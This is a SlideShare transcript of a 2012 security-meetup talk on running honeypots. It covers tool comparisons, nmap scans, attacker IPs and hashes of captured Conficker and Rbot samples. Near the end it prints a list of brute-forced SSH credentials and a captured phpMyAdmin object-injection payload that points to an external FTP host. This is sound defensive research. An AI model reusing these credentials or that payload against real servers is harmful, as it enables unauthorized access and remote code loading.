• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Honeypots - November 8th Misec presentation
 

Honeypots - November 8th Misec presentation

on

  • 2,291 views

5 additional addendum pages added.

5 additional addendum pages added.

Statistics

Views

Total Views
2,291
Views on SlideShare
857
Embed Views
1,434

Actions

Likes
0
Downloads
22
Comments
0

2 Embeds 1,434

http://tazdrumm3r.wordpress.com 1430
http://translate.googleusercontent.com 4

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment
  • Insert video from Duck Dynasty here?
  • Insert video from Duck Dynasty here?
  • Put the ports opened up by dionaea and the results of an nmap scan
  • More interesting stats (by country?)
  • Re do the stats
  • Re do the stats
  • Re do the stats
  • Re do the stats
  • Re do the stats
  • Re do the stats
  • Re do the stats

Honeypots - November 8th Misec presentation Honeypots - November 8th Misec presentation Presentation Transcript

  • Honeypots
  • Agenda• About me• What is a honeypot?• Different kinds of honeypots• Honeypots I used• Different data I discovered
  • About me• Husband• Father• Geek• Gets distracted by shiny objects easy• Breaker/Fixer of things
  • This is not a honeypot.
  • • Lance Spitzner’s definition of honeypots is as follows... • A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource. (May 2003)
  • Open source• Argos• HIHAT (High Interaction Honeypot AnalysisToolkit)• Capture-HPC• Honeywall • Sebek (kernel module)• QebekCommercial• Windows XP SP0• Windows Vista SP0
  • • Kippo
  • Open source• nepenthes • Kojoney• dionaea • Amun• Glastopf • SAFER Honeypot• Google Hack Honeypot (Spoofing Active• HoneyC Fingerprints w/• Honeyd Enhanced Replies) • ThugCommercial• Specter• KFSensor• Honeypoint
  • • Clean-net • Wife and son’s laptops• Dirty-net • My desktop• ?? • Honeybook
  • • Medium interaction • Kippo• Low interaction • Amun • Glastopf •Dionaea • Local • “To the cloud”
  • Port Amun Nepenthes Dionaea21 ftpd ftp25 imail42 wins wins69 tftp80 http asn1 http105 mercury110 axigen, slmail, mdaemon135 dcom dcom epmap139 smb, ms06040, netdde netbiosname, netdde143 lotusdomino
  • Port Amun Nepenthes Dionaea443 iis iis https lsass, pnp, dnsv2, asn1, asn1, dcom, lsass,445 ms06070, ms08067, smb ms08067, pnp smb554 helix587 imail617 arkeia1023 sasserftpd sasserftpd1025 msdtc dcom, msdtc1080 mydoom1111 tivoli1433 mssql
  • Port Amun Nepenthes Dionaea1434 mssql1581 tivoli1900 arc2101 msmq2103 msmq msmq2105 msmq msmq2107 msmq msmq2380 goodtech2555 upnp2745 bagle bagle
  • Port Amun Nepenthes Dionaea2954 hpopenview2967 symantec symantec2968 symantec symantec3127 mydoom mydoom3128 mydoom3140 optix3268 trend3306 mysql3372 msdtc msdtc3628 trend
  • Port Amun Nepenthes Dionaea5000 upnp upnp5060 sip5168 trend5554 sasserftpd sasserftpd6070 arc6101 veritas6129 dameware dameware7144 peercast8080 tivoli9999 maxdb
  • • A low-interaction honeypot• Emulates a wide range of different vulnerabilities.• Payload transmitted by the attacker is analyzed• Any download URL found is extracted.• Next, the honeypot tries to download the malicious software and store it on the local hard disc, for further analyses.
  • • A web application honeypot• Web server written in Python• Popular attack type emulation already in place • Remote file inclusion • Local file inclusion • HTML injection via POST requests • SQL injection emulation
  • • Medium interaction SSH honeypot• Designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker.• Has a fake file system you can read/write to.• You can add additional commands
  • • “To catch bugs”• meant to be a nepenthessuccessor • Python embedded • can detect shellcodes • supports ipv6 and tls.• A VoIP module has beendeveloped as part of GSoc2011
  • # Nmap 6.01 scan initiated Wed Jul 25 21:46:59 2012 as: nmap -A -oN/root/Desktop/dionaea_off.txt 192.168.1.197Nmap scan report for lp (192.168.1.197)Host is up (0.00075s latency).All 1000 scanned ports on lp (192.168.1.197) are closedMAC Address: 08:00:27:7C:3B:55 (Cadmus Computer Systems)Too many fingerprints match this host to give specific OS detailsNetwork Distance: 1 hopTRACEROUTEHOP RTT ADDRESS1 0.75 ms lp (192.168.1.197)OS and Service detection performed. Please report any incorrect results athttp://nmap.org/submit/ .# Nmap done at Wed Jul 25 21:47:01 2012 -- 1 IP address (1 host up)scanned in 2.28 seconds
  • # Nmap 6.01 scan initiated Wed Jul 25 21:47:16 2012 as: nmap -A -oN /root/Desktop/dionaea_on.txt 192.168.1.197Nmap scan report for lp (192.168.1.197)Host is up (0.00087s latency).Not shown: 990 closed portsPORT STATE SERVICE VERSION21/tcp open ftp Dionaea honeypot ftpd |_ftp-anon: Anonymous FTP login allowed (FTP code 230)42/tcp open tcpwrapped80/tcp open http? |_http-title: Directory listing for /135/tcp open msrpc?443/tcp open ssl/https?|_http-title: Directory listing for / | ssl-cert: Subject: commonName=Nepenthes DevelopmentTeam/organizationName=dionaea.carnivore.it/countryName=DE | Not valid before: 2012-07-26 01:47:37 |_Not valid after: 2013-07-26 01:47:37445/tcp open microsoft-ds Dionaea honeypot smbd1433/tcp open ms-sql-s Dionaea honeypot MS-SQL server3306/tcp open mysql MySQL 5.0.54| mysql-info: Protocol: 10 | Version: 5.0.54 | Thread ID: 1729232896 | Some Capabilities: Connect with DB, Compress, Transactions, Secure Connection | Status: Autocommit|_Salt: aaaaaaaa 5060/tcp open sip (SIP end point; Status: 200 OK)5061/tcp open ssl/sip (SIP end point; Status: 200 OK) | ssl-cert: Subject: commonName=Nepenthes DevelopmentTeam/organizationName=dionaea.carnivore.it/countryName=DE| Not valid before: 2012-07-26 01:47:37|_Not valid after:2013-07-26 01:47:374 services unrecognized despite returning data.MAC Address: 08:00:27:7C:3B:55 (Cadmus Computer Systems)Device type: general purposeRunning: Linux 2.6.X|3.XOSCPE: cpe:/o:linux:kernel:2.6 cpe:/o:linux:kernel:3OS details: Linux 2.6.38 - 3.2Network Distance: 1 hopHost scriptresults:|_nbstat: NetBIOS name: LP, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>|_smbv2-enabled: Serverdoesnt support SMBv2 protocol| smb-security-mode: | Account that was used for smb scripts: guest| User-levelauthentication| SMB Security: Challenge/response passwords supported|_ Message signing disabled (dangerous, butdefault)| smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager)| NetBIOS computer name: HOMEUSER-
  • • 14 pcap files, total of 102 Meg• 129 “replay” files – 4 Meg• 2 log files • Error log • Activity log• 2 SQLite database files • Logsqlite – Activity log but in SQLite format • Sipaccounts• 1 malicious executable
  • Day 1• 44 Unique IP addresses• Time it took to get connections – 14 minutesDay 2• xx Unique IP addresses• Time it took to get connections -• Malicious file uploaded • Never live with the results of one tool, always use multiple tools!!
  • TCPPort Occurrences Protocol Occurrence 23 46 Telnet IP address s 22 42 SSH 184.171.169.60 69 80 40 HTTP 74.63.195.90 191080 38 SOCKS Proxy 184.164.150.13 9 135 34 DCE Endpoint 64.31.14.106 5 73 26 NETRJS 101.78.154.123 4 808 20 Net.TCP Port Sharing 118.122.188.96 3 25 15 SMTP 12.134.192.58 3 993 14 IMAPS 175.16.97.164 3 110 11 POP3 178.95.22.152 3 139 9 NetBIOS 184.52.56.26 3 1 8 TCPMUX 199.188.104.83 3 21 6 FTP 211.147.3.19 3 79 6 Finger 221.2.209.46 3 143 5 IMAP 64.31.29.62 3 587 5 SMTP (Email message submission) 71.99.147.51 3 995 5 POP3 over TLS/SSL 117.27.137.48 21096 5 ?? 120.151.204.106 2 43 4 WHOIS 121.52.71.115 2 81 4 Torpack – Onion routing 14.102.115.51 2 199.19.94.85 2
  • 184.171.169.60http://www.securedservers.com/index.php
  • 184.171.169.60http://www.securedservers.com/index.php
  • 74.63.195.90 http://limestonenetworks.com/
  • OccurrenceOS s Link OccurrencesLinux 14 ethernet/modem 54Windows 30 IPv6/IPIP 3Solaris 1 pppoe (DSL) 15 sometimes DSL (3) 4OS version - Windows OS version - LinuxXP/2000 (RFC1323+, w+, tstamp-) 2 2.6 (newer, 1) 1XP SP1+, 2000 SP3 3 2.6 (newer, 2) 22000 SP4, XP SP1+ 22 2.6 (newer, 3) 4 2.6, seldom 2.4 (older,2000 SP2+, XP SP1+ (seldom 98) 3 2) 5 2.6, seldom 2.4 (older, 4) 2
  • Day 1Goals• Get the honeypot installed and up and running• Get some traffic• Run some packet capturesTimeline1. 2:55 pm 1. Started dionaea 2. I immediately run an nmap scan and it just lit up like a Christmas tree. 3. That accounts for 1053 connection attempts. 4. 6:44pm - Started wireshark packet capture2. 3:07 - the first “attacker” appears (me) 1. 6:58 - the first connection appears
  • Day 2Goals• Start saving packet captures (with “no arp” on the capturefilter)• Get some traffic • Catch some malware?Timeline1. 11:12:04am 1. Get a connection from 69.57.27.138 2. Attempts connection to TCP port 135 (epmap). It gets a SYN, ACK.2. 11:12:06 am 1. Tftp session is initiated and malware is being dropped on system3. 11:12:42 am 1. Tftp session completes4. 14:39:47 am 1. He’s back! (Process from 1.1 starts all over again)
  • MD5 - aff643a5014a9d8e98b24fa4dac11623• Virus Total – 40/42 detection ratio • Rbot• ThreatExpert •A malicious backdoor trojan that runs in the background and allows remote access to the compromised system • A network-aware worm that attempts to replicate across the existing network(s)
  • IP Address and Domain Information – Chrome extension (from TCPIPUtils.OrgName Algona Municipal UtilitiesOrgId AMU-6Address 104 West Call StreetAddress PO Box 10City AlgonaStateProv IAPostalCode 50511Country USRegDate 1/20/2011Updated 7/6/2011 http://www.netamu.com/
  • Goals• To the cloud!
  • Round 2Amazon EC2 Ubuntu 12.04 Microinstance• Virginia• Oregon• San Paolo, South America• Ireland• Toyko (Thanks Sukotto_san!)Unable to do• Singapore
  • • Virginia • 3 files• Oregon • 0 files• South America • 1 file• Toyko • 1 file• Ireland • 40 files!!
  • • Virginia • 7a5acd7da5a5d7845a4bcd1a90019e69 • VirusTotal – 40/44 • W32/Conficker.worm.gen.a - Mcafee • 607a710f446de466fcb3be1e5c189c71 • VirusTotal – 42/44 • VirScan.org – File name - azsvf.nmg • 344770974dce3c039b48d27bd4e9a114 • VirusTotal – 41/42 • W32/Conficker.worm – Mcafee • ThreatExpert link - http://www.threatexpert.com/report. aspx?md5=344770974dce3c039b48d27bd4 e9a114
  • OccurrenceIP Address Occurrences TCP Port s Protocol175.23.26.55 1161.147.103.85 7 1443 20 MSSQL Server211.22.54.147 3 Microsoft-DS Active42.121.84.187 2 Directory, Windows31.13.232.59 2 445 6 shares182.1.23.144 2 NetBIOS NetBIOS173.163.222.22 1 139 2 Session Service211.22.54.145 1 Microsoft Terminal 3389 1 Server (RDP)
  • 175.23.26.55Port 1433http://www.chinaunicom.com.hk/en/home/default.html
  • 61.147.103.85Port 1433http://en.chinatelecom.com.cn/
  • 7a5acd7da5a5d7845a4bcd1a90019e69 - Net-Worm.Win32.Kido.ih
  • 344770974dce3c039b48d27bd4e9a114 - Net-Worm.Win32.Kido.ih http://www.telkomsel.com
  • 344770974dce3c039b48d27bd4e9a114
  • 607a710f446de466fcb3be1e5c189c71http://www.hinet.net/
  • 607a710f446de466fcb3be1e5c189c71
  • • South America • 1 file • 0139abdd353ca804aa654c8db556dc46 • VirusTotal – 32/41 • Kaspersky - Trojan.Win32.Jorik.IRCbot.qrq
  • 0139abdd353ca804aa654c8db556dc46
  • • Toyko • 2 files • 933be7b1b0077563f639a99d131bde7f • From: http://esendfile.com/xx81.exe • File name: xx81.exe • Analysis date: 2012-11-02 23:08:50 UTC • VirusTotal – 33/44 • Kaspersky - Trojan- Dropper.Win32.Injector.fyym • Microsoft - VirTool:Win32/CeeInject.gen!IJ • Sophos - Troj/ProcInj-N • csrss.exe • From: smb://87.241.82.99 • (Didn’t save)
  • 87.241.82.99
  • TCPPort Occurances Protocol 3306 909 MySQL database system 176 81 ?? 1433 49 MSSQL Server34354 38 ?? 3389 34 Microsoft Terminal Server (RDP)80 31 Hypertext Transfer Protocol (HTTP)110 18 Post Office Protocol v3 (POP3)445 18 Microsoft-DS Active Directory, Windows shares 25 13 Simple Mail Transfer Protocol (SMTP)139 11 NetBIOS NetBIOS Session Service 23 9 Telnet protocol Microsoft EPMAP (End Point Mapper), also known 135 6 as DCE/RPC Locator service,[14] used to remotely manage services including DHCP server, DNSserver and WINS. Also used by DCOM
  • IP address Occurrences66.225.253.122 273119.1.96.68 19258.211.69.182 17961.160.200.46 99210.195.52.9 81183.136.144.36 78202.165.179.118 3837.46.112.145 3158.16.63.214 30201.116.201.248 28121.245.220.214 24165.225.128.229 18
  • 66.225.253.122Port 3306http://www.servercentral.com/
  • 119.1.96.68Port 3306http://www.chinanet.com
  • • Ireland • 40 files • VirusTotal results • Kaspersky • Microsoft • Sophos • This was from a time frame spanning between
  • DetectionFile name (MD5) ratio: Analysis date: Kaspersky Microsoft Sophos8aefa2d9f0a6cf4d70ecc484 2011-06-25 22:20:53a953c007 37 / 42 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A7c3c59692a7d4c4f53187a4 2011-09-13 20:56:07284bc53df 40 / 44 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A6dd2d5993d634aeab90682 2011-12-07 07:00:30ad2e59376f 38 / 43 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-Adeaf1f22c26f974a7977ba56 2012-08-05 02:50:4178e159a9 36 / 41 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.C Mal/Conficker-A4d2694b90c3fb8e6f9116c2 2012-08-28 05:32:100e8cbfa91 38 / 41 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A9abd8f29a3d24c1c6c32260 2012-09-22 16:47:01e8493ac43 29 / 31 UTC Backdoor.Win32.Rbot.bqj n/a n/a0c059b0d1d5a03f69a21185 2012-11-05 05:32:43987c17d5c 42 / 44 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.C Mal/Conficker-A0d8478eec0a3d9632e7d7c 2012-11-05 05:32:52d432f7ee09 41 / 44 UTC Backdoor.Win32.Rbot.bqj Backdoor:Win32/Rbot W32/Rbot-Gen16ebc1c90231a9e78ed1ed 2012-11-05 05:33:29e0a58e58cb 18 / 21 UTC n/a n/a Mal/Conficker-A2aeae56802c4efc7b68e8e1 2012-11-05 05:35:09f6b04edea 41 / 44 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A
  • DetectionFile name (MD5) ratio: Analysis date: Kaspersky Microsoft Sophos2e8da5a55865a091864a4338ef4d Worm:Win32/Conficker.C Mal/Conficker-2e44 42 / 44 2012-11-05 05:35:26 UTC Net-Worm.Win32.Kido.ih A344770974dce3c039b48d27bd4e9 Mal/Conficker-a114 42 / 44 2012-11-05 05:35:49 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A3d17d15d86c34874039e77341aab Mal/Conficker-b1c4 41 / 44 2012-11-05 05:36:33 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A3f46687b1f8d403b901e46a37045 Mal/Conficker-08ea 42 / 44 2012-11-05 05:36:46 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A4934ddd5bdfa5635f946667d66c83 Trojan.Win32.Genome.m Mal/Conficker-4b6 41 / 43 2012-11-05 05:37:25 UTC voq Worm:Win32/Conficker.B A4fbcfb9557656c96edb479e30eef2f Mal/Conficker-b3 43 / 44 2012-11-05 05:38:02 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A574cf0062911c8c4eca2156187b8 Mal/Conficker-207d 42 / 44 2012-11-05 05:38:35 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A58a4a4bbba4d75dbc6c6c7c9b439 Mal/Conficker-955d 39 / 43 2012-11-05 05:38:39 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A59fe65fad4849c95ed538475c1f70 Trojan.Win32.Genome.wj Mal/Conficker-7cf 42 / 44 2012-11-05 05:38:51 UTC uk Worm:Win32/Conficker.C A5cd426dbec0619b9500a96f24b38 Mal/Conficker-86c8 41 / 44 2012-11-05 05:39:05 UTC Net-Worm.Win32.Kido.ks Worm:Win32/Conficker.B A6ce65eea05ae7fc659a455b5e158 Mal/Conficker-9ab0 40 / 43 2012-11-05 05:40:44 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B A
  • DetectionFile name (MD5) ratio: Analysis date: Kaspersky Microsoft Sophos78c9042bbcefd65beaa0d40386da 2012-11-05 05:41:289f89 39 / 40 UTC n/a Worm:Win32/Conficker.C Mal/Conficker-A7bb455ea4a77b24478fba4de145 2012-11-05 05:41:45115eb 40 / 43 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A94e689d7d6bc7c769d09a590667 2012-11-05 05:43:4227497 42 / 43 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A961cfb405f6aa100bf6a3d66507ed 2012-11-05 05:43:54a18 41 / 44 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A9c09418c738e265a27e6c599f43d 2012-11-05 05:44:1986ab 43 / 44 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-Aa312c8b1adb48a60b0f755a5711b 2012-11-05 05:44:57 Trojan.Win32.Genome.h8995 43 / 44 UTC kck Worm:Win32/Conficker.C Mal/Conficker-Aacf4da36e762084070f8138a4314 2012-11-05 05:45:494759 43 / 44 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-Ab081022fc581decf4c8640dbc74a 2012-11-05 05:46:099198 42 / 43 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-Abc9d30d59788c70060d7eabd6ab 2012-11-05 05:46:575e663 41 / 44 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-Abdc18dfcfa63861aaa9d9fb95919d 2012-11-05 05:47:0132a 42 / 44 UTC Net-Worm.Win32.Kido.ih Worm:Win32/Conficker.B Mal/Conficker-A
  • DetectionFile name (MD5) ratio: Analysis date: Kaspersky Microsoft Sophosc7277972654775258bf3d4d6936eb 2012-11-05 05:48:00 Worm:Win32/Conficker Mal/Conficker-1b0 41 / 44 UTC Net-Worm.Win32.Kido.ih .B Acae4b7963f5e43033664299a4d5bd 2012-11-05 05:48:11 Worm:Win32/Conficker Mal/Conficker-176 43 / 44 UTC Net-Worm.Win32.Kido.ih .B Ad45895e3980c96b077cb4ed8dc163 2012-11-05 05:48:48 Worm:Win32/Conficker Mal/Conficker-db8 43 / 44 UTC Trojan.Win32.Genome.taql .C Ad90b4a84515f3a4d7d4ca716d9263 2012-11-05 05:49:11 Worm:Win32/Conficker Mal/Conficker-a5e 42 / 44 UTC Net-Worm.Win32.Kido.ih .B Ae1855fbe6cf64738bffb9dc195e38ed 2012-11-05 05:49:46 Worm:Win32/Conficker Mal/Conficker-1 41 / 44 UTC Net-Worm.Win32.Kido.ih .B Ae53ed987e82ad7bf076c23d91401c 2012-11-05 05:50:05 Worm:Win32/Conficker Mal/Conficker-ac7 42 / 44 UTC Net-Worm.Win32.Kido.ih .B Aef87b673c8e3b77bdf2342e42e1b5f 2012-11-05 05:50:49 Net- Worm:Win32/Conficker Mal/Conficker-0c 43 / 44 UTC Worm.Win32.Kido.dam.ba .C Afb34cb2d017899592aa1c8d578bfa4 2012-11-05 05:51:36 Worm:Win32/Conficker Mal/Conficker-55 41 / 44 UTC Net-Worm.Win32.Kido.ih .B Ad41d8cd98f00b204e9800998ecf842 2012-11-05 16:11:317e 0 / 42 UTC - - -
  • TCP Port Occurrences Protocol 3306 205 MySQL database system 1433 173 MSSQL Server 445 154 Microsoft-DS Active Directory, Windows shares 5060 45 Session Initiation Protocol (SIP) 139 38 NetBIOS NetBIOS Session Service 80 32 Hypertext Transfer Protocol (HTTP) 3389 13 Microsoft Terminal Server (RDP) 1080 11 SOCKS proxy 135 6 DCE endpoint resolution 9097 5 ?? 23 3 Telnet protocol 110 3 Post Office Protocol v3 (POP3)
  • IP address Occurrences GeoIP location Interesting notes TCPIPUtils.com – 1 of 4 spam databases 48 different websites near this IP61.147.103.137 147 Beijing, Beijing, China (CN) Gaza, Palestinian Territory188.161.92.153 44 (PS) TCPIPUtils.com – 1 of 4 spam databases42.121.19.84 27 Hangzhou, Zhejiang, China (CN) TCPIPUtils.com – 1 of 4 spam databases203.162.35.88 23 Vietnam (VN)125.65.108.65 16 Chengdu, Sichuan, China (CN) 68 different websites near this IP Buenos Aires, Distrito181.0.218.144 16 Federal, Argentina (AR) 26 different websites near this IP65.18.174.167 16 Near Wichita, KS including datemarriedwomen.org Same website where malware from111.249.26.205 14 Taipei, Tai-pei, Taiwan (TW) Virginia came from.211.154.213.122 12 Beijing, Beijing, China (CN) TCPIPUtils.com – 1 of 4 spam databases42.120.0.238 12 Hangzhou, Zhejiang, China (CN) São Paulo, Sao Paulo, Brazil TCPIPUtils.com – 1 of 4 spam databases187.35.61.105 10 (BR) 17 different websites near this IP210.211.117.81 10 Vietnam (VN)
  • t1na/t1na pass/pass oscar/oscar luciana/lucianat1na/tina f/f bot/bot volume/volumealexis/alexis roberto/roberto ba/ba boootz/boootzlogic/logic haiduc/haiduc telegest/telegest display/displayart/art rapper/rapper mwyatt/mwyatt red/reda/a vova/vova j/j wolf/wolfdiablo/diablo medina/medina luci/luci m/mdesiree/desiree password/password silvia/silvia vcsa/vcsab/b g/g apocalipsa/apocalipsa dummy/dummyb1ablo/d1ablo kim/kim simbol/simbol maria/mariaslim/slim ionita/ionita boot/boot ion/ionabel/abel raper/raper best/best sah/sahc/c vava/vava ha/ha powered/poweredparadise/paradise passwd/passwd k/k bombastik/bombastikeminem/eminem nicoara/nicoara postgres/postgres good/gooddoris/doris h/h lucian/lucian pink/pinkshortcut/shortcut goncalo/goncalo apocalipse/apocalipse n/nd/d space/space ioana/ioana visa/visaparadisse/paradisse jurca/jurca skin/skin gianluca/gianlucashaggy/shaggy st/st addicted/addicted atb/atbdamian/damian baba/baba bots/bots bus/busadm/adm change/change thebest/thebest melania/melaniae/e slayer/slayer l/l power/powerbaggio/baggio i/i gdm/gdm dudu/duduhaitac/haitac lucia/lucia box/box bela/belarap/rap apoi/apoi maria/maria fantastic/fantasticjean/jean sst/sst ying/yiang bad/bad
  • blue/blue vh/vh putty/putty marian/marianluca/luca yahoo/yahoo ven/ven conterstrike/conterstrikeclaudius/claudius sly/sly cs/cs abo/aboo/o q/q s/s cretu/cretumastercard/mastercard maryjane/maryjane tehnolog/tehnolog ness/nessbuzzz/buzzz buzz/buzz leo/leo123 u/ubella/bella mago/mago herbagen/herbagen calcul/calculmumu/mumu lammer/lammer romana/romana cimlinux/cimlinuxmada/mada pasare/pasare caine/caine hacker/hackerskype/skype skywalker/skywalker shoot/shoot anton/antonsybille/sybille sims2/sims2 stat/stat germana/germanabed/bed tim/tim mandi/mandi europa/europap/p discovery/discovery ana/ana slow/slowofficeinn/officeinn hotmail/hostmail ambulator/ambulator race/raceterriffic/terriffic vn/vn joc/joc portocala/portocalaroot/password accept/accept conter/conter mark/marksuga/suga marianne/marianne lp/lp v/vmaster/master xman/xman next/next cserv/cservbuz/buz r/r t/t ne/nemadalina/madalina matematica/matematica quatrida/quatrida atai/ataimuie/muie bird/bird gaming/gaming creata/creatainger/inger pisica/pisica zeppelin/zeppelin casa/casaskipe/skipe bang/bang engleza/engleza reebok/reeboksims/sims madi/madi mandarina/mandarina gary/garyqwerty/qwerty lamer/lamer dog/dog tetranet/tetranetamex/amex pix/pix shot/shot rusia/rusiapostgres/postgres sync/sync tara/tara granta/granta
  • smal/smalbanana/bananayes/yesw/wting/tingcretzu/cretzunemesis/nemesisserv/servarpanet/arpanetnee/neecaro/carotax/taxmoscova/moscova
  • Started – 10:10pm November 5th Total – 229 attempts from a single IPStopped – 4:51pm November 6th
  • action=lay_navigation&eoltype=unix&token=&configuration=a:1:{i:0;O:10:"PMA _Config":1:{s:6:"source";s:45:"ftp://hawk1156:PKTuN123@hawkish.co.uk/ieh.ic o";}}http://ubuntuforums.org/showthread.php?t=2076978
  • Websites• Honeynet Projects - http://www.honeynet.org/ • Dionaea - http://dionaea.carnivore.it/ • Honeywall - https://projects.honeynet.org/honeywall/• Amun: Python Honeypot - http://amunhoney.sourceforge.net/• Kippo – http://code.google.com/p/kippo/ • Examples • http://blog.macuyiko.com/2011/03/running-ssh-honeypot- with-kippo-lets.html • http://www.austinriba.com/2011/10/fun-and-trickery- with-the-kippo-ssh-honeypot/• ShadowServer - http://www.shadowserver.org/• Spiderlabs WASC Distributed Web Honeypots Project - http://blog.spiderlabs.com/2012/02/wasc-distributed-web- honeypots-project-update.html
  • Websites• Scumware - http://www.scumware.org/index.scumware• VirusTotal - https://www.virustotal.com/• TCPIPUtils - http://www.tcpiputils.com/ (Great Chrome extension)Tools• Wireshark• Network Miner• Netwitness Investigator
  • • A host at $IP ($location)tried to log into my honeypots fake Terminal Services server• GET-based RFI attack from $IP ($location)• A host at $IP ($location)tried to log into my honeypots fake MSSQL Server http://inguardians.com/
  • Keith Dixon@Tazdrumm3r#misec – Tazdrumm3rtazdrummer@gmail.comhttp://tazdrumm3r.wordpress.com
  • http://hakshop.myshopify.com/products/wifi-pineappleThe Hot-Spot Honeypot Pen-Testing Platform
  • http://securityonion.blogspot.com/• Installing a honeypot? Why not have all the monitoring tools already in place? • And there are some bad ass tools on this distro.• Counting Security Onion is Xubuntu based and all of the honeypot installs are based on Lubuntu, I suspect there won’t be any issues. • I haven’t tested this to confirm. If you find out otherwise, email me. I’d love to know your what you experience.
  • Mercury – Live Honeypot DVDftp://ftp.carnivore.it/projects/dionaea/mercury-dvd http://blog.infosanity.co.uk/2010/09/22/mercury-live-honeypot-dvd/Mercury Live DVD was initially (I believe) announced in a post to theNepenthes Mailing list. It is a remastered Ubuntu distribution with pre-installedhoneypot applications and malware analysis tools created by John Moore.From the ReadMe:This live DVD is a remastered version of Ubuntu 10.0 Beta LTS x86_32. It wasdesigned due to my being disappointed with another reverse engineeringmalware live CD that was released recently. I have decided to call my creationMERCURY, which is an acronym for Malware Enumeration, Capture, andReverse Engineering.The Mercury live DVD contains tools used for digital forensics, data recovery,network monitoring, and spoofing. It should primarily be used as a honeypot ornetwork monitoring platform as well as a laboratory and teaching aid. There arethree honeypots installed – honeyd, nepenthes, and dionaea. Four, if you
  • Scripts, tools and other lessons learned• Amun • amun_install.sh • Location to grab the file • How to set it up• Dionaea • install_dionaea.sh (Quick and easy setup) • install_dionaea_full_monty.sh (previously ran successfully on a Mint 12 install) • run_dionaea.sh • run_p0f_dionaea.sh (In case you want to capture OS information)• Glastopf • setup_glastopf.sh (Script untested, but ran through steps manually successfully)• Kippo • kippo_install.sh (This is one option on installing and running {last line runs it})
  • Scripts, tools and other lessons learnedLessons learned• Run only one honeypot at a time• When running a honeypot from the cloud, test test and retest your packet capture script • When in doubt, use dumpcap (it’s been the most successful for me)• Adjust the level of logging on dionaea if you’re running in the cloud, especially if you’re in an extremely active area. • Downloading a 4 Gig log file from Ireland was not a quick process • First time running dionaea, log everything. • Adjust your logging level according to the information you see. • If a lot is not useful, dial it back a notch or two.• Install on an Ubuntu based system. • I tried installing on a Debian based load and ran into dependency issues. • The keyboard is small and I want to minimize the time at the keyboard. ;) • I haven’t tried Fedora or OpenSuSE or BSD based systems. • If you do, let me know your results. (See slide # 88 for my contact info)• Take the time to get a good dionaea config file. • Getting the malware is good. Automatically submitting to